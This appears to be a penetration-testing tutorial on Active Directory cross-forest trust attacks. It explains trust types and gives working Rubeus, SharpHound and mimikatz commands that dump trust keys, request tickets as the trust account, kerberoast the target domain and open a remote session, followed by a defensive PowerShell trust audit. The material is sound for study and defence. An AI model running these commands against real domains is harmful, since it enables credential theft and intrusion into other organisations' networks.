Cross Forest Attacks

In Active Directory (AD), a trust is a connection between the authentication systems of two domains, allowing users from one domain to access resources in another. Trusts exist both within a single AD forest and between separate forests (cross-forest trusts). There are many ways to attack cross-forest trusts.

Types of Cross-Forest Trusts

  1. External Trust: Connects two separate domains in different forests that do not have a forest trust, and uses SID filtering to prevent SID History abuse.

  2. Forest Trust: Connects two entire AD forests, allowing users from one forest to authenticate across all domains in the other forest. If Forest A trusts Forest X, then any user from Forest X can access any domain in Forest A.

|                      | One-Way Trust | Two-Way Trust |
|----------------------|---------------|---------------|
| Direction of Access  | Trusted → Trusting | Both ways (Bidirectional) |
| Who Can Access What? | Users in the trusted domain can access the trusting domain, but not vice versa. | Users from both domains/forests can access each other's resources. |
| Common Use Case      | A parent company allows employees from a subsidiary to access shared resources, but not the other way around. | Common in large organizations where domains need to share resources freely. |
| Security Risk        | Lower risk, as access is limited to one direction. | Higher risk, since a compromise in one domain/forest can affect the other. |

In a nutshell

  • AD trusts allow users in different domains/forests to access resources.

  • External Trusts are more restrictive and use SID Filtering.

  • Forest Trusts are more flexible but riskier because they allow full authentication across forests.

  • One-Way Trusts allow access in only one direction, while Two-Way Trusts allow access in both directions.

  • Attackers can abuse trust relationships if security is not properly configured.

Kerberoasting targeting a Domain

.\Rubeus.exe kerberoast /domain:logistics.ad /user:holly

Trust Account Attack

In the example above we see a one-way trust from Forest A to Forest B: access works from A to B but not the other way around. To break this rule we can perform a Trust Account Attack.

When a trust is created, a trust account (A$) is automatically created in Forest B. This account is just a regular domain user in Forest B. Attackers in Forest A can steal the credentials of this trust account and then log in to Forest B, bypassing the one-way restriction.

# Enumerate the trust from the attacker-controlled domain
Get-ADTrust -Identity megacorp.ad

# Collect the target domain with SharpHound
.\SharpHound.exe -c All -d megacorp.ad

# Extract the forest trust keys (run on a DC of the attacker-controlled forest)
.\mimikatz.exe "lsadump::trust /patch" exit

# Request a TGT for the trust account logistics$ in the target domain using the extracted key
.\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:68e456d3a95cc748ac5a2eae679b9c91 /ptt

# Kerberoast the target domain as the trust account
.\Rubeus.exe kerberoast /domain:megacorp.ad

# Or request a ticket for a user whose password was recovered
.\Rubeus.exe asktgt /user:white.beard /password:<SNIP> /domain:megacorp.ad /ptt

# Open a remote session to the target DC
New-PSSession DC03.megacorp.ad
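From the defender's side, the attack above depends on a handful of trust properties: direction, transitivity, SID filtering, selective authentication, and the existence of the other domain's trust account in your domain. The following PowerShell audit is an added example, not code from the original page; it assumes the RSAT ActiveDirectory module, a domain-joined host with read access to trust and account objects, and (as a fallback when flatName is unavailable) that the NetBIOS name equals the first DNS label.

```powershell
# Added example, not from the original page: audit the trusts of the current domain for the
# properties the attacks above rely on. Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

function Get-TrustRisk {
    param([string]$Server)                      # optional DC/domain to query (default: current domain)
    $query = @{ Filter = '*'; Properties = 'flatName' }
    if ($Server) { $query['Server'] = $Server }

    foreach ($t in Get-ADTrust @query) {
        $findings = @()
        if ($t.Direction -eq 'BiDirectional') {
            $findings += 'Bidirectional: a compromise on either side reaches the other'
        }
        # Forest trusts rely on SIDFilteringForestAware, external trusts on SIDFilteringQuarantined;
        # with either disabled, SID History presented by the other side is honoured here.
        if ($t.ForestTransitive -and -not $t.SIDFilteringForestAware) {
            $findings += 'Forest trust with SID filtering disabled'
        } elseif (-not $t.IntraForest -and -not $t.ForestTransitive -and -not $t.SIDFilteringQuarantined) {
            $findings += 'External trust without quarantine (SID filtering off)'
        }
        if (-not $t.SelectiveAuthentication) {
            $findings += 'Selective authentication off: any user of the other side may authenticate'
        }

        # For inbound (and bidirectional) trusts the other domain's trust account <FLATNAME>$ lives
        # here and its password is the trust key stored on the other side's DCs. Whoever dumps that
        # key there can log in here as this account, which is the Trust Account Attack above.
        $acct = $null
        if ($t.Direction -in 'Inbound', 'BiDirectional') {
            $flat = if ($t.flatName) { $t.flatName } else { $t.Name.Split('.')[0] }   # assumption: NetBIOS = first label
            # userAccountControl bit 0x800 (2048) = INTERDOMAIN_TRUST_ACCOUNT
            $acct = Get-ADObject -LDAPFilter "(&(sAMAccountName=$flat`$)(userAccountControl:1.2.840.113556.1.4.803:=2048))" `
                                 -Properties pwdLastSet, memberOf -ErrorAction SilentlyContinue
            if ($acct -and $acct.memberOf.Count -gt 0) {
                $findings += "Trust account $flat`$ has extra group memberships: $($acct.memberOf -join '; ')"
            }
        }

        [pscustomobject]@{
            Trust        = $t.Name
            Direction    = $t.Direction
            Type         = if ($t.IntraForest) { 'Intra-forest' } elseif ($t.ForestTransitive) { 'Forest' } else { 'External' }
            TrustAccount = if ($acct) { $acct.Name } else { '(none in this domain)' }
            KeyLastSet   = if ($acct) { [DateTime]::FromFileTime($acct.pwdLastSet) } else { $null }
            Findings     = $findings -join ' | '
        }
    }
}

Get-TrustRisk | Format-List
```

Any trust that reports an inbound direction with a present trust account is one where a compromise of the other side yields a valid logon in your domain regardless of the one-way restriction; review its group memberships and the SID filtering and selective authentication flags for that trust.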
